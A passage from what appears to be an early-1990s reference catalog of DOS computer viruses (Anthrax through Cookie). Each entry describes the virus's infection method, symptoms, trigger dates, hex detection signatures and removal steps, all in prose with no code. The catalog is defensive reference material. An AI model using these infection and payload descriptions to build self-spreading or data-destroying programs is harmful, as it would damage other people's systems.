                     infected.  All infected programs will start with the
                     following hex string, with the nn indicated being a
                     generation number:
                     "EB14905353nn2A2E434F4D004F040000"
                     Origin: Bulgaria


 Virus Name:  Anthrax
 Aliases:
 V Status:    Rare
 Discovery:   July, 1990
 Symptoms:    .COM & .EXE growth
 Origin:      Bulgaria
 Isolated:    Netherlands
 Eff Length:  1040 - 1279 Bytes
 Type Code:   PRAKX - Parasitic Resident .COM, .EXE, & Partition Table Infector
 Detection Method:  ViruScan V66+, Pro-Scan 2.01+
 Removal Instructions: Scan/D + MDisk/P, Pro-Scan 2.01+
 General Comments:
       The Anthrax Virus was isolated in July 1990 in the Netherlands after
       it was uploaded onto several BBSes in a trojan anti-viral program,
       USCAN.ZIP.  It is the second virus to be found in a copy of UScan
       during July 1990, the first virus being V2100.  Anthrax is a memory
       resident generic infector of .COM and .EXE files, including
       COMMAND.COM.

       The first time a program infected with the Anthrax virus is executed
       on the system's hard disk, the virus will infect the hard disk's
       partition table.  At this point, the virus is not memory resident.  It
       will also write a copy of itself on the last few sectors of the
       system's hard disk.  If data existed on those last few sectors of the
       hard disk, it will be destroyed.

       When the system is booted from the hard disk, the Anthrax virus
       will install itself memory resident.  It will remain memory resident
       until the first program is executed.  At that time, it will deinstall
       itself from being resident and infect one .COM or .EXE file.  This
       virus does not infect files in the current directory first, but
       instead starts to infect files at the lowest level of the disk's
       directory tree.

       Later, when an infected program is executed, Anthrax will infect one
       .COM or .EXE file, searching the directory structure from the lowest
       level of the directory tree.  If the executed infected program
       was located on the floppy drive, a .COM or .EXE file may or may not
       be infected.

       The Anthrax Virus's code is 1,024 bytes long, but infected programs
       will increase in length by 1,040 to 1,279 bytes.  On the author's test
       system, the largest increase in length experienced was 1,232 bytes.
       Infected files will always have an infected file length that is a
       multiple of 16.

       The following text strings can be found in files infected with the
       Anthrax virus:

               "(c)Damage, Inc."
               "ANTHRAX"

       A third text string occurs in the viral code, but it is in Cyrillics.
       Per Vesselin Bontchev, this third string translates to: "Sofia 1990".

       Since Anthrax infects the hard disk partition tables, infected systems
       must have the partition table disinfected or rebuilt in order to
       remove the virus.  This disinfection can be done with either a low-
       level format or use of the MDisk/P program for the correct DOS
       version after powering off and rebooting from a write-protected boot
       diskette for the system.  Any .COM or .EXE files infected with
       Anthrax must also be disinfected or erased.  Since a copy of the virus
       will exist on the last few sectors of the drive, these must also be
       located and overwritten.

       Anthrax interacts with another virus: V2100.  If a system which was
       previously infected with Anthrax should become infected with the V2100
       virus, the V2100 virus will check the last few sectors of the hard
       disk for the spare copy of Anthrax.  If the spare copy is found, then
       Anthrax will be copied to the hard disk's partition table.

       It is not known if Anthrax carries any destructive capabilities or
       trigger/activation dates.


 Virus Name:  Anti-Pascal
 Aliases:     Anti-Pascal 605 Virus, AP-605, C-605, V605
 V Status:    Research
 Discovery:   June, 1990
 Symptoms:    .COM growth, .BAK and .PAS file corruption
 Origin:      Bulgaria
 Isolated:    Sofia, Bulgaria
 Eff Length:  605 Bytes
 Type Code:   PNCK - Parasitic Non-Resident .COM Infector
 Detection Method:  ViruScan/X V67+, Pro-Scan 2.01+
 Removal Instructions: Pro-Scan 2.01+, Scan/D/X, or delete infected files
 General Comments:
       The Anti-Pascal Virus, V605 or C-605, was isolated in Sofia,
       Bulgaria in June 1990 by Vesselin Bontchev.  Originally, it was
       thought that the Anti-Pascal virus was from the USSR or Poland,
       but it has since been determined to have been a research virus
       written in Bulgaria over one year before it was isolated.  The
       author was not aware that it had "escaped" until July, 1990.

       The Anti-Pascal Virus is a generic .COM file infector, including
       COMMAND.COM.  While this virus is not memory resident, when it is
       in the process of infecting files, interrupt 24 will be hooked.

       When a program infected with the Anti-Pascal virus is executed,
       the virus will attempt to infect two other .COM files on the
       current drive or on drive D: which are between 605 and 64,930
       bytes in length.  These files must not have the read only
       attribute set.  If an uninfected .COM file meeting the virus's
       selection criteria is found, the first 605 bytes of the program
       is overwritten with the viral code.  The original 605 bytes of
       the program is then appended to the end of the infected file.
       Infected files will have increased in length by 605 bytes, and
       they will also begin with the text string "PQVWS" as well as
       contain the string "combakpas???exe" at offset 0x17.  Infected
       files will also have had their file date/time stamps in the
       directory updated to the date/time that the infection occurred.

       If the Anti-Pascal Virus cannot find two .COM files to infect,
       it will check the current drive and directory for .BAK and .PAS
       files.  If these files exist, they will be overwritten with the
       virus's code.  If the overwritten files were .PAS files, the
       system's user has now lost some of their Pascal source code.
       After overwriting .BAK and .PAS files, the virus will attempt to
       rename them to .COM files, or .EXE files if a .COM file already
       exists.  This rename does not work due to a bug in the virus.

       Known variant(s) of the Anti-Pascal Virus are:
       AP-529    : Similar to the 605 byte Anti-Pascal Virus, the major
                   differences are that AP-529 will only infect .COM files
                   over 2,048 bytes in length.  Infected files increase in
                   length by 529 bytes.  Additionally, instead of overwriting
                   the .BAK and .PAS files, one .BAK and .PAS file will be
                   deleted if there are no uninfected .COM files with a
                   length of at least 2,048 bytes on the current drive.
                   .COM files on the C: drive root directory may also be
                   infected by AP-529 when it is executed from the A: or B:
                   drive.  This variant should be considered a "Research
                   Virus", it is not believed to have been publicly
                   released.

       Also see: Anti-Pascal II


 Virus Name:  Anti-Pascal II
 Aliases:     Anti-Pascal 400, AP-400
 V Status:    Research
 Discovery:   June, 1990
 Symptoms:    .COM growth; .BAK, .BAT and .PAS file deletion, boot sector
              alteration on hard disk
 Origin:      Bulgaria
 Isolated:    Sofia, Bulgaria
 Eff Length:  400 Bytes
 Type Code:   PNCK - Parasitic Non-Resident .COM Infector
 Detection Method:  ViruScan/X V67+, Pro-Scan 2.01+
 Removal Instructions: Pro-Scan 2.01+, Scan/D/X, or delete infected files
 General Comments:
       The Anti-Pascal II Virus, or AP-400, was isolated in Sofia,
       Bulgaria in June 1990 by Vesselin Bontchev.  It is one of five
       viruses/variants in the Anti-Pascal family.  Two of the earlier
       variants, Anti-Pascal/AP-605 and AP-529, are documented under
       the name "Anti-Pascal".  The variants listed under Anti-Pascal II
       have been separated due to some of their characteristics differing
       from the 605 byte and 529 byte viruses.

       The Anti-Pascal II Virus is a generic .COM file infector, including
       COMMAND.COM.  While this virus is not memory resident, when it is
       in the process of infecting files, interrupt 21 will be hooked.

       The first time a program infected with the Anti-Pascal II virus is
       executed on a system, the virus will attempt to infect one (1)
       .COM file in the root directory of each drive accessible on the
       system.  Files are only infected if their length is at least 2,048
       bytes, and the resulting infected file will be less than 64K in
       length.  Since COMMAND.COM is usually the first .COM file on a
       drive, it will immediately become infected.  One additional .COM
       file will also be infected on the current drive.  The mechanism used
       to infect the file is to write the virus's code to the end of the
       file.  A jump is used to execute the virus's code before the original
       program is executed.  Infected files do not have their date/time
       stamps in the directory updated to the system date and time when the
       infection occurred.

       If the Anti-Pascal Virus cannot find a .COM file to infect on a
       given drive, or two .COM files to infect on the current drive,
       it will check for the existence of .BAK, .PAS, or .BAT files.  If
       found, these files will be deleted.  These deletions only occur in
       root directories and on the current drive's current directory.  Since
       each root directory (as well as the current directory) will typically
       not have all of its .COM files infected at the same time, the deletes
       will occur on different drives and directories at different times.

       Symptoms of infection of the Anti-Pascal II Virus include file length
       increases of 400 bytes, unexpected disk access to drives other than
       the current drive, and disappearing .BAK, .PAS, and .BAT files.  One
       other symptom of an Anti-Pascal II infection is that the hard disk's
       boot sector will be slightly altered by the virus.  Anti-viral programs
       which CRC-check the boot sector will indicate that a boot sector
       infection may have occurred.  The boot sector alteration does not
       contain a live virus, but will throw the system user off into thinking
       their problem is from a boot sector virus instead of a file infector,
       and if the disk as a bootable disk, it will not be unbootable.

       The Anti-Pascal II Virus and its variants indicated below are not
       believed to have been publicly released.  As such, they have been
       classified as "Research Viruses".

       Known variant(s) of the Anti-Pascal II Virus are:
       AP-440    : Very similar to the 400 byte version of the Anti-Pascal II
                   Virus, the major characteristic change is that this
                   variant has a length of 440 bytes.  The boot sector is no
                   longer altered by the virus.  This variant is an
                   intermediary between AP-480 and the 400 byte version
                   documented above.
       AP-480    : Similar to the Anti-Pascal II virus, this variant is the
                   version which is 480 bytes in length.  It does not
                   delete .BAT files, but only .BAK and .PAS.  This variant
                   is the latest variant of the Anti-Pascal II grouping.

       Also see: Anti-Pascal


 Virus Name:  Armagedon
 Aliases:     Armagedon The First, Armagedon The Greek
 V Status:    Rare
 Discovery:   June, 1990
 Symptoms:    text string intermittently sent to COM ports
 Origin:      Athens, Greece
 Eff Length:  1,079 Bytes
 Type Code:   PRC - Parasitic Resident .COM Infector
 Detection Method: ViruScan V64+, F-Prot 1.12+, Pro-Scan 2.01+
 Removal Instructions: Scan/D, F-Prot 1.12+, or Delete infected files
 General Comments:
       The Armagedon virus was isolated on June 2, 1990, by George
       Spiliotis of Athens, Greece.  Armagedon is a memory resident
       virus which infects .COM files, increasing their length by 1,079
       bytes.

       The first time an infected program is executed on a system, the
       virus installs itself memory resident, hooking interrupts 8 and 21.
       Any .COM files which are later executed are then infected by the
       resident virus.

       Infected systems will experience the text string "Armagedon the GREEK"
       being sent to COM ports 1 - 4 at time intervals.  Between 5:00 and
       7:00, the virus will attempt to use the system's COM ports to make
       a phone call to Local Time Information in Crete, Greece.  If a
       connection is made, the phone line will remain open until the user
       notices that the phone line is in use.  (Needless to say, this
       doesn't work if the system is located outside of Greece as dialing
       codes are considerably different between countries.)

       This virus otherwise is not destructive.

 
 Virus Name:  Ashar
 Aliases:     Shoe_Virus, UIUC Virus
 V Status:    Common
 Discovery:   
 Symptoms:    BSC, Resident TOM
 Origin:      
 Eff Length:  N/A
 Type Code:   BRt - Resident Boot Sector Infector
 Detection Method:  ViruScan V41+, F-Prot, IBM Scan, Pro-Scan 1.4+, AVTK 3.5+,
              VirHunt 2.0+
 Removal Instructions:  MDisk, CleanUp, Pro-Scan 1.4+, F-Prot or
              DOS SYS command
 General Comments:
       The Ashar virus is a resident boot sector infector which is
       a variant of the Brain virus.  It differs from the Brain
       virus in that it can infect both floppies and hard disk, and
       the message in the virus has been modified to be:

            "VIRUS_SHOE RECORD, v9.0.  Dedicated to the dynamic
            memories of millions of virus who are no longer with us
            today".

       However, the above message is never displayed.  The
       identification string "ashar" is normally found at offset
       04a6 hex in the virus.

       A variant of the Ashar virus exists, Ashar-B or Shoe_Virus-B,
       which has been modified so that it can no longer infect hard
       drives.  The v9.0 in the message has also been altered to v9.1.

       Also see: Brain


 Virus Name:  Attention!
 Aliases:     USSR 394
 V Status:    Rare
 Discovery:   December, 1990
 Symptoms:    .COM file growth; decrease in system and available memory;
              clicking emitted from system speaker on keypress; file date/time
              changes
 Origin:      USSR
 Eff Length:  394 Bytes
 Type Code:   PRhCK - Parasitic Resident .COM  Infector
 Detection Method:  ViruScan V74+
 Removal Instructions: Scan/D, or Delete infected files
 General Comments:
       The Attention! Virus was submitted in December, 1990 and was originally
       isolated in the USSR.  This virus is a memory resident infector of COM
       files, including COMMAND.COM.

       The first time a program infected with the Attention! Virus is executed,
       the virus will reserve 416 bytes at the top of system memory but below
       the 640K DOS boundary.  The virus becomes memory resident in this area,
       and hooks interrupt 21.  Total system memory and available free memory
       returned by the DOS ChkDsk command will decrease by 416 bytes.  The
       interrupt 12 return is not moved.

       After the virus is memory resident, a clicking sound will be emitted
       by the system speaker each time a key is pressed on the keyboard.  Some
       programs, such as the Edlin program supplied with MS-DOS, will receive
       an "Invalid drive or file name" message when they are attempted to be
       executed.

       Attention! will infect COM files, including COMMAND.COM, when they are
       executed.  The exception is that very small COM files will not become
       infected.  Infected files will increase in length by 394 bytes with the
       virus being located at the end of the file.  Infected programs will also
       contain the text string: "ATTENTION  !" near the beginning of the
       program.


 Virus Name:  Best Wishes
 Aliases:     Best Wish
 V Status:    Rare
 Discovery:   December, 1990
 Symptoms:    .COM file growth; decrease in system and available free memory;
              system hangs; file date/time changes; file not found errors;
              boot sector modification
 Origin:      USSR
 Eff Length:  970 Bytes
 Type Code:   PRtCK - Parasitic Resident .COM Infector
 Detection Method:  ViruScan V74+
 Removal Instructions: Scan/D, or Delete infected files
 General Comments:
       The Best Wishes Virus was submitted in December, 1990 and is believed
       to be from the USSR.  Best Wishes is a memory resident infector of
       COM files, including COMMAND.COM.  There is a variant of this virus,
       Best Wishes B, which is 1,024 bytes in length.

       The first time a program infected with the Best Wishes Virus is
       executed, the virus will install itself memory resident in system high
       memory, but below the 640K DOS boundary.  The interrupt 12 return will
       be moved.  Total system memory will decrease by 61,440 bytes, available
       free memory will decrease by 61,360 bytes.  COMMAND.COM will become
       infected at this time, and the disk's boot sector will also be modified.
       Disks with the boot sector modification and infected COMMAND.COM will
       still boot properly.

       After Best Wishes is resident, the virus will infect COM files as they
       are executed with a probability of 50%.  Infected COM files will
       increase in length by 970 bytes with the virus being located at the
       end of the infected file.  Infected programs will also have the following
       text string located near the end of the file:

               "This programm ... With Best Wishes!"

       Best Wishes does not restore the original file date and time in the
       directory when it infects programs, so all infected programs will have
       their date/time stamps set to the system date and time when infection
       occurred.

       Two additional symptoms of a Best Wishes infection are that the user
       may experience "File not found" errors when the file is actually on
       disk, as well as system hangs on every fourth program execution.

       Known variant(s) of Best Wishes are:
       Best Wishes B - An earlier version of Best Wishes, this variant is
             1,024 bytes in length.  The major differences are that infected
             disks will not boot if COMMAND.COM has been modified.  Execution
             of a COM program once the virus is memory resident will result in
             the program most likely being infected, but the system will also
             become hung.


 Virus Name:  Black Monday
 Aliases:
 V Status:    Rare
 Discovery:   September, 1990
 Symptoms:    .COM & .EXE file growth; TSR; file timestamp changes
 Origin:      Kuala Lumpur, Malaysia
 Eff Length:  1,055 Bytes
 Type Code:   PRsAK - Parasitic Resident .COM & .EXE Infector
 Detection Method: ViruScan V67+, Pro-Scan 2.01+
 Removal Instructions: Pro-Scan 2.01+, Scan/D, or Delete infected files
 General Comments:
       The Black Monday Virus was isolated in Fiji in September, 1990.  It
       is reported to be widespread in Fiji and other locations in the Far
       East and Asia.  This virus is a memory resident generic infector of
       .COM and .EXE files, including COMMAND.COM.

       The first time a program infected with the Black Monday Virus is
       executed, the virus will install itself memory resident as a low
       system memory TSR of 2,048 bytes.  Interrupt 21 will be hooked by
       the virus.

       Once the virus is memory resident, any program which is executed
       will become infected with the Black Monday Virus.  .COM files will
       increase in length by 1,055 bytes with the virus's code located at
       the end of the infected files.  .EXE files will also increase in
       length by 1,055 bytes with the virus's code added to the end of
       the file.  This virus does not infect .EXE files multiple times.

       The virus does not hide the change in file length when the directory
       is displayed, though a directory display will indicated that the
       infected file's date/timestamp have been updated to the system date
       and time when the file was infected.

       The following text string can be found in all infected files near
       the beginning of the virus's code:

               "Black Monday 2/3/90 KV KL MAL"

       It is unknown when Black Monday activates, or what it does at
       activation.


 Virus Name:  Blood
 Aliases:     Blood2
 V Status:    Rare
 Discovery:   August, 1990
 Symptoms:    .COM file length increase, system reboots and/or hangs,
              cascading screen effect
 Origin:      Natal, Republic of South Africa
 Eff Length:  418 Bytes
 Type Code:   PNCK - Parasitic Non-Resident .COM Infector
 Detection Method: Pro-Scan 2.0+
 Removal Instructions: Delete infected files
 General Comments:
       The Blood Virus was submitted by Fridrik Skulason in August, 1990.
       It was originally isolated in Natal, Republic of South Africa.  There
       are two variants of this virus, Blood and Blood2.  This virus is a
       non-resident infector of .COM files, including COMMAND.COM.

       When a program infected with the Blood virus is executed, it will
       infect one .COM file located in the C: drive root directory.  The
       newly infected file will have increased in length by 418 bytes.  If
       the program just infected is COMMAND.COM, a system reboot will
       occur.  Following the system reboot, executing an infected program
       will result in a cascading effect of the cursor down the screen.  The
       next .COM file executed will then result in the hard disk being
       accessed followed by the system hanging.  Spurious characters from
       memory may also appear on the screen on the line below the command
       line.

       After August 15, execution of an infected program will result in a
       system hang.

       Known variant(s) of Blood are:
       Blood2 : Similar to Blood, with the major difference being that
                system reboots, system hangs, and the cascading cursor
                effect no longer occur.  This variant also does not hang
                the system after August 15.


 Virus Name:  Bloody!
 Aliases:
 V Status:    Rare
 Discovery:   December, 1990
 Symptoms:    Extended boot time; decrease in system & available memory;
              message on boot; boot sector & partition table changes
 Origin:      Taiwan
 Eff Length:  N/A
 Type Code:   BRtX - Resident Boot Sector & Partition Table Infector
 Detection Method:  ViruScan V72+
 Removal Instructions:  See below
 General Comments:
       The Bloody! Virus was submitted in December 1990, and infection
       reports were received from Europe, Taiwan, and the United States.  This
       virus is a memory resident infector of floppy diskette boot sectors as
       well as the hard disk partition table.

       When a system is booted from a floppy or hard disk infected with the
       Bloody! Virus, the virus will install itself memory resident at the
       top of system memory but below the 640K DOS boundary.  Total system
       memory and available free memory will decrease by 2,048 bytes.  The
       interrupt 12 return will be moved.  The system boot will also take
       much longer than expected.  The system's hard disk's partition table
       will become infected immediately if it was not the source of the
       system boot.

       At the time of system boot, the virus also maintains a counter of how
       many times the infected diskette or hard drive has been booted.  Once
       128 boots have occurred, the virus will display the following message
       during the boot:

               "Bloody! Jun. 4, 1989"

       June 4, 1989 is the date of the the confrontation in Beijing, China
       between Chinese students and the Chinese Army in which many students
       were killed.

       This message will later be displayed on every sixth boot once the
       128 boot limit has been reached.  The text message is encrypted within
       the viral code, so it is not visible in the boot sector.

       Once Bloody! is memory resident, the virus will infect any diskette
       or hard disk when a file or program is accessed.  Listing a disk
       directory will not be enough to cause the virus to infect the disk.

       Infected diskette boot sectors will be missing all of the normal
       DOS error messages which are normally found in the boot sector.  The
       original boot sector will have been moved to sector 11 on 360K diskettes,
       a part of the root directory.  If there were previously root directory
       entries in that sector, those files will be lost.

       On the hard disk, the original partition table will have been moved
       to side 0, cylinder 0, sector 6.

       For floppies of other sizes then 360K, they may become unusable or
       corrupted as the virus does not take into account the existence of these
       disk types.

       For diskettes, Bloody! can be removed by powering the system off and
       then booting from a known-clean, write protected original DOS diskette.
       The DOS SYS command should then be executed on each of the infected
       diskettes.

       To remove the Bloody! Virus from the hard disk's partition table, the
       original partition table should be located and then copied back to
       its original position.  The other option is to backup the files on
       the hard disk and low level format the drive.


 Virus Name:  Brain
 Aliases:     Pakistani, Pakistani Brain
 V Status:    Common
 Discovery:   1986
 Symptoms:    Extended boot time, Volume label change, Resident TOM,
              Three contiguous bad sectors (floppy only), BSC
 Origin:      Pakistan
 Eff Length:  N/A
 Type Code:   BRt - Resident Boot Sector Infector
 Detection Method:  ViruScan, F-Prot, IBM Scan, Pro-Scan, AVTK 3.5+,
              VirHunt 2.0+
 Removal Instructions:  MDisk, CleanUp, F-Prot, Pro-Scan, or DOS SYS command
 General Comments:
       The Pakistani Brain virus originated in Lahore, Pakistan and
       infects disk boot sectors by moving the original contents of the
       boot sector to another location on the disk, marking those 3
       clusters (6 sectors) bad in the FAT, and then writing the virus
       code in the disk boot sector.

       One sign of a disk having been infected, at least with the
       original virus, is that the volume label will be changed
       to "(c) Brain".  Another sign is that the label "(c) Brain" can
       be found in sector 0 (the boot sector) on an infected disk.

       This virus does install itself resident on infected systems,
       taking up between 3K and 7K of RAM.  The Brain virus is able to
       hide from detection by intercepting any interrupt that might
       interrogate the boot sector and redirecting the read to the
       original boot sector located elsewhere on the disk, thus some
       programs will be unable to see the virus.

       The original Brain virus only infected floppies, however variants
       to the virus can now infect hard disks.  Also, some variants
       have had the "(c) Brain" label removed to make them harder to
       detect.

       Known variants of the Brain virus include:
       Brain-B/Hard Disk Brain/Houston Virus - hard disk version.
       Brain-C - Brain-B with the "(c) Brain" label removed.
       Clone Virus - Brain-C but restores original boot copyright label.
       Clone-B - Clone Virus modified to destroy the FAT after 5/5/92.

       Also see: Ashar


 Virus Name:  Burger
 Aliases:     541, 909090h, CIA
 V Status:    Extinct
 Discovery:   1986
 Symptoms:    Programs will not run after infection
 Origin:      West Germany
 Eff Length:  560 Bytes
 Type Code:   ONAK - Overwriting Non-Resident .COM & .EXE Infector
 Detection Method:  ViruScan V67+, Pro-Scan 2.01+
 Removal Instructions: Scan /D, or delete infected files
 General Comments:
       The Burger, or 909090h, Virus was written and copyrighted in 1986 by
       Ralf Burger of West Germany.  This virus is extinct in the "public
       domain".  This virus is a non-resident overwriting virus, infecting
       .COM and .EXE files, including COMMAND.COM.

       When a program infected with the Burger Virus is executed, the virus
       will attempt to infect one previously uninfected .COM file located in
       the C: drive root directory.  To determine if the program was previously
       infected, the virus checks to see if the first three bytes of the .COM
       file are three NOP instructions (909090h).  If the first three bytes are
       the NOP instructions, the virus goes on checking until it finds an
       uninfected .COM file.  If no uninfected .COM file exists, the virus
       then renames all the .EXE files in the root directory to .COM files and
       checks those files.  Once it finds a .COM file to infect, it overwrites
       the first 560 bytes of the uninfected program with the virus code.  At
       this point, the program the user was attempting to run will either
       end or hang the system.  Infected programs will never execute properly
       as the first portion of the program has been destroyed.

       Systems which have been infected with the Burger Virus will fail to
       boot once the virus has infected the hard disk boot partition's
       COMMAND.COM, or the copy of COMMAND.COM on their boot diskette.

       Infected files can be easily identified by the "909090B8000026A245"
       hex sequence located in the first nine bytes of all infected files.
       Infected files cannot be disinfected, they must be replaced from a
       clean source.

       Known variant(s) of the Burger virus include:
       CIA     : Discovered in the United States in October, 1990, this virus
                 is similar to the Burger Virus described above.  The first
                 nine bytes of all infected files in hex will be:
                 "909090B8000026A3A5".   The actual length of this variant
                 is 541 bytes, though the first 560 bytes of infected programs
                 are overwritten.
       505     : Similar to the Burger virus, this variant's actual code length
                 is 505 bytes, though the first 560 bytes of infected files
                 will be overwritten.  Infected files will have their first
                 nine bytes contain the hex string: "909090B8000026A3A0".
       509     : Similar to the Burger virus, this variant's actual code length
                 is 509 bytes, though the first 560 bytes of infected files
                 will be overwritten.  Infected files will have their first
                 nine bytes contain the hex string: "909090B8000026A3A4".
       541     : Similar to the Burger virus, this variant overwrites the
                 first 560 bytes of infected programs, though the virus's
                 length is actually 541 bytes.  Infected programs will start
                 with the hex sequence: "909090B8000026A3A4".

       Also see: VirDem


 Virus Name:  Carioca
 Aliases:
 V Status:    Rare
 Discovery:   November, 1990
 Symptoms:    TSR; .COM growth
 Origin:
 Eff Length:  951 Bytes
 Type Code:   PRsC - Parasitic Resident .COM Infector
 Detection Method:  ViruScan V71+, Pro-Scan 2.01+
 Removal Instructions: Scan/D, Pro-Scan 2.01+, or Delete Infected Files
 General Comments:
       The Carioca Virus was submitted in November, 1990.  This virus is a
       memory resident infector of .COM files, it does not infect COMMAND.COM.

       The first time a program infected with the Carioca Virus is executed,
       the virus will install itself memory resident as a 1,280 byte low
       system memory TSR.  Interrupt 21 will be hooked by the virus.  The
       system's available free memory will decrease by 1,312 bytes.

       After the virus is memory resident, any .COM file executed (with the
       exception of COMMAND.COM) will become infected with the Carioca
       Virus.  Infected .COM files will show an increase in size of 951 bytes
       with the virus being located at the end of the infected file.  Infected
       files will have the following hex character string located at the
       very end of the file: "2EFF1E1A010203CD21".

       It is unknown if Carioca contains any damage potential.


 Virus Name:  Cascade
 Aliases:     Fall, Falling Letters, 1701, 1704
 V Status:    Common
 Discovery:   October, 1987
 Symptoms:    TSR, Falling letters, .COM file growth
 Origin:      Germany
 Eff Length:  1,701 or 1,704 bytes
 Type Code:   PRsC - Parasitic Resident Encrypting .COM Infector
 Detection Method:  ViruScan, F-Prot, IBM Scan, Pro-Scan, VirexPC, AVTK 3.5+,
              VirHunt 2.0+
 Removal Instructions:  CleanUp, F-Prot, VirexPC, VirHunt 2.0+, Pro-Scan 2.01+
 General Comments:
       Originally, this virus was a trojan horse which was disguised
       as a program which was supposed to turn off the number-lock
       light when the system was booted.  The trojan horse instead
       caused all the characters on the screen to fall into a pile
       at the bottom of the screen.  In late 1987, the trojan horse
       was changed by someone into a memory resident .COM virus.

       While the original virus had a length of 1,701 bytes and would
       infect both true IBM PCs and clones, a variation exists of
       this virus which is 3 bytes longer than the original virus
       and does not infect true IBM PCs.  Both viruses are
       functionally identical in all other respects.

       Both of the viruses have some fairly unique qualities:  Both
       use an encryption algorithm to avoid detection and complicate
       any attempted analysis of them.  The activation mechanisms
       are based on a sophisticated randomization algorithm
       incorporating machine checks, monitor types, presence or
       absence of a clock card, and the time or season of the year.

       The viruses will activate on any machine with a CGA or VGA
       monitor in the months of September, October, November, or
       December in the years 1980 and 1988.

       Known variants of the Cascade virus are:
       1701-B : Same as 1701, except that it can activate in the
                fall of any year.
       1704-D : Same as the 1704, except that the IBM selection
                has been disabled so that it can infect true IBM
                PCs.
       17Y4   : Similar to the Cascade 1704 virus, the only difference is
                one byte in the virus which has been altered.
       Cunning: Based on the Cascade virus, a major change to the virus
                is that it now plays music.

       Also see: 1704 Format


 Virus Name:  Cascade-B
 Aliases:     Blackjack, 1704-B
 V Status:    Common
 Discovery:
 Symptoms:    .COM file growth, TSR, random reboots
 Origin:      Germany
 Eff Length:  1,704 bytes
 Type Code:   PRsC - Parasitic Resident Encrypting .COM Infector
 Detection Method:  ViruScan, F-Prot, IBM Scan, VirexPC, AVTK 3.5+, Pro-Scan,
              VirHunt 2.0+
 Removal Instructions:  CleanUp, F-Prot, VirexPC, VirHunt 2.0+
 General Comments:
       The Cascade-B virus is similar to the Cascade virus, except
       that the cascading display has been replaced with a system
       reboot which will occur at random time intervals after the
       virus activates.

       Other variation(s) which have been documented are:
       1704-C : Same as 1704-B except that the virus can activate in
                December of any year. 


 Virus Name:  Casper
 Aliases:
 V Status:    Rare
 Discovery:   August, 1990
 Symptoms:    .COM file growth, April 1st disk corruption (see below)
 Origin:
 Eff Length:  1,200 bytes
 Type Code:   PNCK - Parasitic Non-Resident Encrypting .COM Infector
 Detection Method:  ViruScan V67+, Pro-Scan 2.01+
 Removal Instructions: Scan/D, or Delete infected files
 General Comments:
       The Casper Virus was isolated in August, 1990 by Fridrik Skulason of
       Iceland.  The origin of this virus is unknown at this time.  Casper
       is a non-resident generic infector of .COM files, including COMMAND.COM.

       When a program infected with the Casper Virus is executed, the virus
       will attempt to infect one .COM program located in the current drive
       and directory.  Infected files will increase in length by 1,200 bytes,
       with the virus's code being located at the end of the .COM file.

       The Casper Virus contains the following message, though this message
       cannot be seen in infected program as Casper uses a complex self-
       encryption mechanism:

             "Hi! I'm Casper The Virus, And On April 1st I'm Gonna
              Fuck Up Your Hard Disk REAL BAD! In Fact It Might Just
              Be Impossible To Recover! How's That Grab Ya! <GRIN>"

       On April 1st, when an infected program is executed, this virus will
       overwrite the first track of the drive where the infected program was
       executed from.  Later attempts to access the drive will result in
       "Sector not found" errors occurring.

       The Casper Virus is based on the Vienna virus.  Unlike Vienna, it is
       self-encrypting.  The self-encryption mechanism employed is similar
       to the encryption mechanism used in the V2P6 virus, and requires an
       algorithmic approach in order to identify it as there are not any
       identifying strings located in the encrypted virus.


 Virus Name:  Chaos
 Aliases:
 V Status:    Rare
 Discovery:   December, 1989
 Symptoms:    Message, TSR, Bad sectors, BSC
 Origin:      England
 Eff Length:  N/A
 Type Code:   BR - Resident Boot Sector Infector
 Detection Method:  ViruScan V53+
 Removal Instructions:  MDisk, CleanUp, or DOS SYS Command
 General Comments:
       First reported in December, 1989 by James Berry of Kent,
       England, the Chaos virus is a memory resident boot sector
       infector of floppy and hard disks.

       When the Chaos virus infects a boot sector, it overwrites the
       original boot sector without copying it to another location
       on the disk.  Infected boot sectors will contain the
       following messages:

            "Welcome to the New Dungeon"
            "Chaos"
            "Letz be cool guys"

       The Chaos virus will flag the disk as being full of bad
       sectors upon activation, though most of the supposed bad
       sectors are still readable.  It is unknown what the
       activation criteria is.


 Virus Name:  Christmas In Japan
 Aliases:     Xmas In Japan
 V Status:    Rare
 Discovery:   September, 1990
 Symptoms:    .COM file growth; Message
 Origin:      Taiwan
 Eff Length:  600 Bytes
 Type Code:   PNCK - Resident Non-Resident .COM Infector
 Detection Method:  ViruScan V67+, Pro-Scan 2.01+
 Removal Instructions:  Scan/D, Pro-Scan 2.01+, or Delete infected files
 General Comments:
       The Christmas In Japan Virus was isolated in Taiwan in late September,
       1990.  As of early October, it is reported to be widespread in Japan.
       This virus is a 600 byte non-resident generic infector of .COM files.
       It will infect COMMAND.COM.

       When a program infected with the Christmas In Japan Virus is executed,
       the virus will infect zero to one other .COM file in the current
       directory.  If a file is infected, it will increase in length by
       600 bytes, with the virus being located at the end of the infected
       file.

       On December 25, if an infected file is executed, the following message
       will be displayed in the center of the screen:

               "A merry christmas to you"

       The message will flash and will be underlined for approximately half
       the time it is displayed.  If left alone, the message will go away
       after a little while and the program will execute normally, but the
       message will return when another infected .COM file is executed.

       This virus does not appear to do any malicious damage.


 Virus Name:  Christmas Virus
 Aliases:     Tannenbaum, XA1, 1539
 V Status:    Endangered
 Discovery:   March, 1990
 Symptoms:    .COM file growth, display, Partition table destruction
 Origin:      Germany
 Eff Length:  1,539 Bytes
 Type Code:   PNCX - Parasitic Non-Resident .COM Infector
 Detection Method:  ViruScan V61+, VirexPC, VirHunt 2.0+, Pro-Scan 2.01+
 Removal Instructions:  Scan/D, VirHunt 2.0+, Pro-Scan 2.01+,
              or delete infected files
 General Comments:
       The Christmas Tree, or XA1, Virus was first isolated in March 1990
       by Christoff Fischer of West Germany.  This virus is an encrypting
       virus which will only infect .COM files.

       On April 1st of any year, the Christmas Tree virus will activate,
       destroying the partition table of infected hard disks the first
       time an infected program is executed.  During the period from
       December 24 until January 1st of any year, when an infected
       program is executed, the virus will display a full screen picture
       of a christmas tree.


 Virus Name:  Cookie
 Aliases:
 V Status:    New
 Discovery:   January, 1991
 Symptoms:    .COM & .EXE growth; system hangs
 Origin:      Unknown/Europe
 Eff Length:  2,232 bytes
 Type Code:   PNAK - Parasitic Non-Resident .COM & .EXE Infector
 Detection Method:  ViruScan, F-Prot, VirexPC
 Removal Instructions:  Scan/D, or Delete infected files
 General Comments:
       The Cookie Virus was received in January, 1991, it is believed to have
       originated in Europe.  This virus is based on the SysLock Virus, though
       it is considerably shorted in length.  Some anti-viral utilities will
       identify this virus as SysLock, though it is listed here separately
       due to its differences in characteristics.  It is a non-resident direct
